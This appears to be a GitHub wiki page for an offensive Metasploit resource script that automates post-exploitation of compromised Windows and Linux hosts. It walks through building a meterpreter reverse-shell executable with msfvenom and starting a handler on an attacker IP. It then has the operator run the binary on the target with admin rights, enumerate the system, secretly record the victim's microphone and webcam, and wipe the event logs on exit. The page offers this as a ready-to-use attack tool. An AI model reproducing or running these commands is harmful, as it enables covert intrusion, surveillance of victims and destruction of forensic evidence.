post_exploitation.rc | offensive resource script

Description

Resource File to automate/assiste in session post_exploitation tasks.
This script displays a menu of commands based on session platform (windows or linux).
It also querys the framework database for session ID to be able to run post-modules againts it.
And it will allow us to automatically lunch multi-post-msf-modules againts target session

Example of commands beeing executed using [Command]: gather

localtime
sysinfo
getuid
run post/windows/gather/checkvm
webcam_list
run post/multi/gather/wlan_geolocate
run post/windows/gather/enum_shares
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_computers
run post/windows/gather/enum_applications
enumdesktops
show_mount
run post/windows/recon/enum_protections
unsetg all
unset all

This script can be review here

Remark

'This script can NOT be run in meterpreter prompt because ERB code its not accepted'
'In windows platforms the script will clean target event viewer artifacts (logs) at exit'
'if none value (setg) has povided (before exec) then this script will use is own default values'

Settings available (before executing the script) - optional settings

msf > setg MSF_PATH /opt/metasploit-framework => (absoluct path of metasploit-framework)
msf > setg REC_TIME 15 => (timeout in sec to record using target mic/camera)
REMARK: This global settings (setg) will be clean everytime the script ends execution.

1º - donwload project from github

git clone https://github.com/r00t-3xp10it/resource_files.git

2º - install all post_exploitation.rc dependencies

cd resource_files
cd aux
sudo chmod +x install.sh
sudo ./install.sh

As we can see from the above screenshot 'post_exploitation.rc' resource script requires 3 metasploit post modules written by me to assist in post-exploitation tasks, since gather info untill persiste our payload in target system or use freevulnsearch.nse nmap nse script (@Mathias Gut) to scan for possible CVEs present...

cd ..
sudo service postgresql start

3º - build msf payload (windows platforms)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=666 -f exe -o binary.exe

4º - start multi/handler

  msfconsole -q -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.1.11; set LPORT 666; exploit'

5º - copy binary.exe to target system and execute it.

REMARK: execute binary.exe with admin privs (execute as admin)

6º - when we recibe the session.. (background meterpreter)..

meterpreter > background

7º - load post_exploitation.rc

msf > resource post_exploitation.rc

8º - run play_youtube command

[command]: play_youtube
[+] Input youtube URL: 35Yq7ae6F8E

More exercices

9º - load script again

msf > resource post_exploitation.rc

10º - run rec_target command

[command]: rec_target
[+] Record audio from target microphone? (y/n): yes
[+] Record video from target camera? (y/n): yes

Final Notes:

If we decided to use one Linux payload..
Then this script will present a diferent 'commands menu' for Linux platforms.

post_exploitation.rc video tutorial (windows platforms)
https://www.youtube.com/watch?v=PcT-25YCdoQ

Jump to wiki description

Provide feedback

Saved searches

Use saved searches to filter your results more quickly